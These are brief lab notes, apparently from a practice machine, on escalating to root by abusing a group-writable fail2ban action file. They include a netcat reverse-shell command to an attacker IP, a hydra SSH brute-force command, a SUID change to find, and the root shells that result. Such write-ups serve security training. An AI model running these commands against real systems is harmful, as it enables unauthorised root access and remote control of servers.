4 privesc fail2ban
fox@fail:~$ id
uid=1000(fox) gid=1001(fox) groups=1001(fox),1000(fail2ban)
# Fail2Ban is an IPS framework that protects computer servers from brute-force attacks.
Using https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/
# log file location; cant read it
fox@fail:~$ ls -la /var/log/fail2ban.log
-rw-r----- 1 root adm 127311 Aug 23 22:31 /var/log/fail2ban.log
fox@fail:~$ ls -la /etc/fail2ban/
[truncated]
drwxrwxr-x 2 root fail2ban 4096 Dec 3 2020 action.d
# /etc/fail2ban/action.d is WRITABLE by fail2ban group
# fox is part of fail2ban group
fox@fail:/etc/fail2ban/action.d$ ls -la iptables-multiport.conf
-rw-rw-r-- 1 root fail2ban 1420 Jan 18 2018 iptables-multiport.conf
# is writable
# updating /etc/fail2bain/action.d/iptables-multiport.conf
actionban = /usr/bin/nc -e /bin/bash 192.168.49.122 9000
chmod +s /usr/bin/find
# before
fox@fail:~$ ls -la /usr/bin/find
-rwxr-xr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
# now trying to brute force ssh user fox
$ hydra -l fox -P /usr/share/wordlists/rockyou.txt ssh://192.168.122.126 -t 4 -s 22
$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.126] 36734
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
fail
# after
fox@fail:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
# can get shell using find also
fox@fail:~$ find . -exec /bin/sh -p \; -quit
# whoami
root
Last updated